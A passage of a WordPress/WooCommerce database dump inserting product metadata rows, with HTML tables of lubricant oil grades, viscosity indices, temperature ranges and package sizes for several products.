Elastomers</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (2867, 302, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (2868, 302, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (2869, 302, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (2870, 302, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (2871, 436, '_edit_lock', '1475592979:2'); 
INSERT INTO `wp_postmeta` VALUES (2872, 436, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (2873, 436, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (2874, 436, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (2875, 436, '312_default_editor', '<table width="1368">\r\n<tbody>\r\n<tr>\r\n<td width="208">Oil Grades</td>\r\n<td style="text-align: center;" width="145"><strong>100</strong></td>\r\n<td style="text-align: center;" width="145"><strong>101</strong></td>\r\n<td style="text-align: center;" width="145"><strong>102</strong></td>\r\n<td style="text-align: center;" width="145"><strong>103</strong></td>\r\n<td style="text-align: center;" width="145"><strong>104</strong></td>\r\n<td style="text-align: center;" width="145"><strong>105</strong></td>\r\n<td style="text-align: center;" width="145"><strong>106</strong></td>\r\n<td style="text-align: center;" width="145"><strong>107</strong></td>\r\n</tr>\r\n<tr>\r\n<td>Oil Viscosity Index</td>\r\n<td style="text-align: center;">-</td>\r\n<td style="text-align: center;">-</td>\r\n<td style="text-align: center;">29</td>\r\n<td style="text-align: center;">92</td>\r\n<td style="text-align: center;">111</td>\r\n<td style="text-align: center;">124</td>\r\n<td style="text-align: center;">134</td>\r\n<td style="text-align: center;">145</td>\r\n</tr>\r\n<tr>\r\n<td>Temperature Range °F</td>\r\n<td style="text-align: center;">-94-150</td>\r\n<td style="text-align: center;">-94-220</td>\r\n<td style="text-align: center;">-81-270</td>\r\n<td style="text-align: center;">-76-310</td>\r\n<td style="text-align: center;">-60-355</td>\r\n<td style="text-align: center;">-33-400</td>\r\n<td style="text-align: center;">-33-500</td>\r\n<td style="text-align: center;">-22-550</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (2876, 436, '317_default_editor', '<table class=" aligncenter">\r\n<tbody>\r\n<tr>\r\n<td width="104"><strong>Syringe</strong></td>\r\n<td width="104"><strong>Dab-O-Matic</strong></td>\r\n<td width="104"><strong>Needle Nose Bottle</strong></td>\r\n<td width="104"><strong>Jar</strong></td>\r\n<td width="104"><strong>Bottle</strong></td>\r\n<td width="104"><strong>Jug</strong></td>\r\n</tr>\r\n<tr>\r\n<td width="104">.5 oz.</td>\r\n<td width="104">1 oz.</td>\r\n<td width="104">1 oz.</td>\r\n<td width="104">.5 kg</td>\r\n<td width="104">1 kg</td>\r\n<td width="104">5 kg</td>\r\n</tr>\r\n<tr>\r\n<td width="104">1 oz.</td>\r\n<td width="104">2 oz.</td>\r\n<td width="104">2 oz.</td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n<td width="104">20 kg</td>\r\n</tr>\r\n<tr>\r\n<td width="104">2 oz.</td>\r\n<td width="104">-</td>\r\n<td width="104">-</td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n</tr>\r\n<tr>\r\n<td width="104">-</td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (2877, 436, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (2878, 436, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (2879, 436, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (2880, 436, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (2881, 436, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (2882, 436, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (2883, 436, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (2884, 436, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (2885, 436, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (2886, 436, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (2887, 436, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (2888, 436, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (2889, 436, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (2890, 436, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (2891, 436, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (2892, 436, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (2893, 436, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (2894, 436, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (2895, 436, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (2896, 436, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (2897, 436, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (2898, 436, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (2899, 436, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (2900, 436, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (2901, 436, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (2902, 436, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (2903, 436, '_product_image_gallery', '385,386,387,388'); 
INSERT INTO `wp_postmeta` VALUES (2905, 436, '318_custom_list_file', 'a:1:{s:32:"0f56c72f01d489ddf11bd7f17f74f118";a:3:{s:4:"name";s:20:"GPL Comparison Chart";s:4:"file";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/GPL-PDF.pdf";s:4:"desc";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (2934, 436, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (2935, 436, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (2936, 437, '_edit_lock', '1475593197:2'); 
INSERT INTO `wp_postmeta` VALUES (2937, 437, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (2938, 437, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (2939, 437, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (2940, 437, '312_default_editor', '<table width="1368">\r\n<tbody>\r\n<tr>\r\n<td width="208">Oil Grades</td>\r\n<td style="text-align: center;" width="145"><strong>100</strong></td>\r\n<td style="text-align: center;" width="145"><strong>101</strong></td>\r\n<td style="text-align: center;" width="145"><strong>102</strong></td>\r\n<td style="text-align: center;" width="145"><strong>103</strong></td>\r\n<td style="text-align: center;" width="145"><strong>104</strong></td>\r\n<td style="text-align: center;" width="145"><strong>105</strong></td>\r\n<td style="text-align: center;" width="145"><strong>106</strong></td>\r\n<td style="text-align: center;" width="145"><strong>107</strong></td>\r\n</tr>\r\n<tr>\r\n<td>Oil Viscosity Index</td>\r\n<td style="text-align: center;">-</td>\r\n<td style="text-align: center;">-</td>\r\n<td style="text-align: center;">29</td>\r\n<td style="text-align: center;">92</td>\r\n<td style="text-align: center;">111</td>\r\n<td style="text-align: center;">124</td>\r\n<td style="text-align: center;">134</td>\r\n<td style="text-align: center;">145</td>\r\n</tr>\r\n<tr>\r\n<td>Temperature Range °F</td>\r\n<td style="text-align: center;">-94-150</td>\r\n<td style="text-align: center;">-94-220</td>\r\n<td style="text-align: center;">-81-270</td>\r\n<td style="text-align: center;">-76-310</td>\r\n<td style="text-align: center;">-60-355</td>\r\n<td style="text-align: center;">-33-400</td>\r\n<td style="text-align: center;">-33-500</td>\r\n<td style="text-align: center;">-22-550</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (2941, 437, '317_default_editor', '<table class=" aligncenter">\r\n<tbody>\r\n<tr>\r\n<td width="104"><strong>Syringe</strong></td>\r\n<td width="104"><strong>Dab-O-Matic</strong></td>\r\n<td width="104"><strong>Needle Nose Bottle</strong></td>\r\n<td width="104"><strong>Jar</strong></td>\r\n<td width="104"><strong>Bottle</strong></td>\r\n<td width="104"><strong>Jug</strong></td>\r\n</tr>\r\n<tr>\r\n<td width="104">.5 oz.</td>\r\n<td width="104">1 oz.</td>\r\n<td width="104">1 oz.</td>\r\n<td width="104">.5 kg</td>\r\n<td width="104">1 kg</td>\r\n<td width="104">5 kg</td>\r\n</tr>\r\n<tr>\r\n<td width="104">1 oz.</td>\r\n<td width="104">2 oz.</td>\r\n<td width="104">2 oz.</td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n<td width="104">20 kg</td>\r\n</tr>\r\n<tr>\r\n<td width="104">2 oz.</td>\r\n<td width="104">-</td>\r\n<td width="104">-</td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n</tr>\r\n<tr>\r\n<td width="104">-</td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (2942, 437, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (2943, 437, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (2944, 437, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (2945, 437, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (2946, 437, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (2947, 437, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (2948, 437, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (2949, 437, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (2950, 437, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (2951, 437, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (2952, 437, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (2953, 437, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (2954, 437, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (2955, 437, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (2956, 437, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (2957, 437, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (2958, 437, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (2959, 437, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (2960, 437, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (2961, 437, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (2962, 437, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (2963, 437, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (2964, 437, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (2965, 437, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (2966, 437, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (2967, 437, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (2968, 437, '_product_image_gallery', '385,386,387,388'); 
INSERT INTO `wp_postmeta` VALUES (2970, 437, '318_custom_list_file', 'a:1:{s:32:"0f56c72f01d489ddf11bd7f17f74f118";a:3:{s:4:"name";s:20:"GPL Comparison Chart";s:4:"file";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/GPL-PDF.pdf";s:4:"desc";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (2999, 437, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (3000, 437, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (3001, 438, '_edit_lock', '1475593567:2'); 
INSERT INTO `wp_postmeta` VALUES (3002, 438, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (3003, 438, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (3004, 438, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (3005, 438, '312_default_editor', '<table width="1368">\r\n<tbody>\r\n<tr>\r\n<td width="208">Oil Grades</td>\r\n<td style="text-align: center;" width="145"><strong>100</strong></td>\r\n<td style="text-align: center;" width="145"><strong>101</strong></td>\r\n<td style="text-align: center;" width="145"><strong>102</strong></td>\r\n<td style="text-align: center;" width="145"><strong>103</strong></td>\r\n<td style="text-align: center;" width="145"><strong>104</strong></td>\r\n<td style="text-align: center;" width="145"><strong>105</strong></td>\r\n<td style="text-align: center;" width="145"><strong>106</strong></td>\r\n<td style="text-align: center;" width="145"><strong>107</strong></td>\r\n</tr>\r\n<tr>\r\n<td>Oil Viscosity Index</td>\r\n<td style="text-align: center;">-</td>\r\n<td style="text-align: center;">-</td>\r\n<td style="text-align: center;">29</td>\r\n<td style="text-align: center;">92</td>\r\n<td style="text-align: center;">111</td>\r\n<td style="text-align: center;">124</td>\r\n<td style="text-align: center;">134</td>\r\n<td style="text-align: center;">145</td>\r\n</tr>\r\n<tr>\r\n<td>Temperature Range °F</td>\r\n<td style="text-align: center;">-94-150</td>\r\n<td style="text-align: center;">-94-220</td>\r\n<td style="text-align: center;">-81-270</td>\r\n<td style="text-align: center;">-76-310</td>\r\n<td style="text-align: center;">-60-355</td>\r\n<td style="text-align: center;">-33-400</td>\r\n<td style="text-align: center;">-33-500</td>\r\n<td style="text-align: center;">-22-550</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (3006, 438, '317_default_editor', '<table class=" aligncenter">\r\n<tbody>\r\n<tr>\r\n<td width="104"><strong>Syringe</strong></td>\r\n<td width="104"><strong>Dab-O-Matic</strong></td>\r\n<td width="104"><strong>Needle Nose Bottle</strong></td>\r\n<td width="104"><strong>Jar</strong></td>\r\n<td width="104"><strong>Bottle</strong></td>\r\n<td width="104"><strong>Jug</strong></td>\r\n</tr>\r\n<tr>\r\n<td width="104">.5 oz.</td>\r\n<td width="104">1 oz.</td>\r\n<td width="104">1 oz.</td>\r\n<td width="104">.5 kg</td>\r\n<td width="104">1 kg</td>\r\n<td width="104">5 kg</td>\r\n</tr>\r\n<tr>\r\n<td width="104">1 oz.</td>\r\n<td width="104">2 oz.</td>\r\n<td width="104">2 oz.</td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n<td width="104">20 kg</td>\r\n</tr>\r\n<tr>\r\n<td width="104">2 oz.</td>\r\n<td width="104">-</td>\r\n<td width="104">-</td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n</tr>\r\n<tr>\r\n<td width="104">-</td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (3007, 438, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (3008, 438, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (3009, 438, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (3010, 438, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (3011, 438, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (3012, 438, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (3013, 438, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (3014, 438, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (3015, 438, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (3016, 438, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (3017, 438, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (3018, 438, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (3019, 438, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (3020, 438, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (3021, 438, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (3022, 438, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (3023, 438, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (3024, 438, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (3025, 438, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (3026, 438, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (3027, 438, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (3028, 438, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (3029, 438, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (3030, 438, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (3031, 438, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (3032, 438, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (3033, 438, '_product_image_gallery', '385,386,387,388'); 
INSERT INTO `wp_postmeta` VALUES (3035, 438, '318_custom_list_file', 'a:1:{s:32:"0f56c72f01d489ddf11bd7f17f74f118";a:3:{s:4:"name";s:20:"GPL Comparison Chart";s:4:"file";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/GPL-PDF.pdf";s:4:"desc";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (3064, 438, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (3065, 438, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (3066, 439, '_edit_lock', '1475593632:2'); 
INSERT INTO `wp_postmeta` VALUES (3067, 439, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (3068, 439, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (3069, 439, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (3070, 439, '312_default_editor', '<table width="1368">\r\n<tbody>\r\n<tr>\r\n<td width="208">Oil Grades</td>\r\n<td style="text-align: center;" width="145"><strong>100</strong></td>\r\n<td style="text-align: center;" width="145"><strong>101</strong></td>\r\n<td style="text-align: center;" width="145"><strong>102</strong></td>\r\n<td style="text-align: center;" width="145"><strong>103</strong></td>\r\n<td style="text-align: center;" width="145"><strong>104</strong></td>\r\n<td style="text-align: center;" width="145"><strong>105</strong></td>\r\n<td style="text-align: center;" width="145"><strong>106</strong></td>\r\n<td style="text-align: center;" width="145"><strong>107</strong></td>\r\n</tr>\r\n<tr>\r\n<td>Oil Viscosity Index</td>\r\n<td style="text-align: center;">-</td>\r\n<td style="text-align: center;">-</td>\r\n<td style="text-align: center;">29</td>\r\n<td style="text-align: center;">92</td>\r\n<td style="text-align: center;">111</td>\r\n<td style="text-align: center;">124</td>\r\n<td style="text-align: center;">134</td>\r\n<td style="text-align: center;">145</td>\r\n</tr>\r\n<tr>\r\n<td>Temperature Range °F</td>\r\n<td style="text-align: center;">-94-150</td>\r\n<td style="text-align: center;">-94-220</td>\r\n<td style="text-align: center;">-81-270</td>\r\n<td style="text-align: center;">-76-310</td>\r\n<td style="text-align: center;">-60-355</td>\r\n<td style="text-align: center;">-33-400</td>\r\n<td style="text-align: center;">-33-500</td>\r\n<td style="text-align: center;">-22-550</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (3071, 439, '317_default_editor', '<table class=" aligncenter">\r\n<tbody>\r\n<tr>\r\n<td width="104"><strong>Syringe</strong></td>\r\n<td width="104"><strong>Dab-O-Matic</strong></td>\r\n<td width="104"><strong>Needle Nose Bottle</strong></td>\r\n<td width="104"><strong>Jar</strong></td>\r\n<td width="104"><strong>Bottle</strong></td>\r\n<td width="104"><strong>Jug</strong></td>\r\n</tr>\r\n<tr>\r\n<td width="104">.5 oz.</td>\r\n<td width="104">1 oz.</td>\r\n<td width="104">1 oz.</td>\r\n<td width="104">.5 kg</td>\r\n<td width="104">1 kg</td>\r\n<td width="104">5 kg</td>\r\n</tr>\r\n<tr>\r\n<td width="104">1 oz.</td>\r\n<td width="104">2 oz.</td>\r\n<td width="104">2 oz.</td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n<td width="104">20 kg</td>\r\n</tr>\r\n<tr>\r\n<td width="104">2 oz.</td>\r\n<td width="104">-</td>\r\n<td width="104">-</td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n</tr>\r\n<tr>\r\n<td width="104">-</td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (3072, 439, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (3073, 439, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (3074, 439, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (3075, 439, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (3076, 439, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (3077, 439, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (3078, 439, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (3079, 439, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (3080, 439, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (3081, 439, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (3082, 439, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (3083, 439, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (3084, 439, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (3085, 439, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (3086, 439, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (3087, 439, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (3088, 439, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (3089, 439, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (3090, 439, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (3091, 439, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (3092, 439, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (3093, 439, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (3094, 439, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (3095, 439, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (3096, 439, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (3097, 439, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (3098, 439, '_product_image_gallery', '385,386,387,388'); 
INSERT INTO `wp_postmeta` VALUES (3100, 439, '318_custom_list_file', 'a:1:{s:32:"0f56c72f01d489ddf11bd7f17f74f118";a:3:{s:4:"name";s:20:"GPL Comparison Chart";s:4:"file";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/GPL-PDF.pdf";s:4:"desc";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (3129, 439, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (3130, 439, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (3131, 440, '_edit_lock', '1475593701:2'); 
INSERT INTO `wp_postmeta` VALUES (3132, 440, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (3133, 440, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (3134, 440, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (3135, 440, '312_default_editor', '<table width="1368">\r\n<tbody>\r\n<tr>\r\n<td width="208">Oil Grades</td>\r\n<td style="text-align: center;" width="145"><strong>100</strong></td>\r\n<td style="text-align: center;" width="145"><strong>101</strong></td>\r\n<td style="text-align: center;" width="145"><strong>102</strong></td>\r\n<td style="text-align: center;" width="145"><strong>103</strong></td>\r\n<td style="text-align: center;" width="145"><strong>104</strong></td>\r\n<td style="text-align: center;" width="145"><strong>105</strong></td>\r\n<td style="text-align: center;" width="145"><strong>106</strong></td>\r\n<td style="text-align: center;" width="145"><strong>107</strong></td>\r\n</tr>\r\n<tr>\r\n<td>Oil Viscosity Index</td>\r\n<td style="text-align: center;">-</td>\r\n<td style="text-align: center;">-</td>\r\n<td style="text-align: center;">29</td>\r\n<td style="text-align: center;">92</td>\r\n<td style="text-align: center;">111</td>\r\n<td style="text-align: center;">124</td>\r\n<td style="text-align: center;">134</td>\r\n<td style="text-align: center;">145</td>\r\n</tr>\r\n<tr>\r\n<td>Temperature Range °F</td>\r\n<td style="text-align: center;">-94-150</td>\r\n<td style="text-align: center;">-94-220</td>\r\n<td style="text-align: center;">-81-270</td>\r\n<td style="text-align: center;">-76-310</td>\r\n<td style="text-align: center;">-60-355</td>\r\n<td style="text-align: center;">-33-400</td>\r\n<td style="text-align: center;">-33-500</td>\r\n<td style="text-align: center;">-22-550</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (3136, 440, '317_default_editor', '<table class=" aligncenter">\r\n<tbody>\r\n<tr>\r\n<td width="104"><strong>Syringe</strong></td>\r\n<td width="104"><strong>Dab-O-Matic</strong></td>\r\n<td width="104"><strong>Needle Nose Bottle</strong></td>\r\n<td width="104"><strong>Jar</strong></td>\r\n<td width="104"><strong>Bottle</strong></td>\r\n<td width="104"><strong>Jug</strong></td>\r\n</tr>\r\n<tr>\r\n<td width="104">.5 oz.</td>\r\n<td width="104">1 oz.</td>\r\n<td width="104">1 oz.</td>\r\n<td width="104">.5 kg</td>\r\n<td width="104">1 kg</td>\r\n<td width="104">5 kg</td>\r\n</tr>\r\n<tr>\r\n<td width="104">1 oz.</td>\r\n<td width="104">2 oz.</td>\r\n<td width="104">2 oz.</td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n<td width="104">20 kg</td>\r\n</tr>\r\n<tr>\r\n<td width="104">2 oz.</td>\r\n<td width="104">-</td>\r\n<td width="104">-</td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n</tr>\r\n<tr>\r\n<td width="104">-</td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (3137, 440, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (3138, 440, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (3139, 440, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (3140, 440, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (3141, 440, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (3142, 440, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (3143, 440, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (3144, 440, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (3145, 440, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (3146, 440, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (3147, 440, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (3148, 440, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (3149, 440, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (3150, 440, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (3151, 440, '_price', ''); 
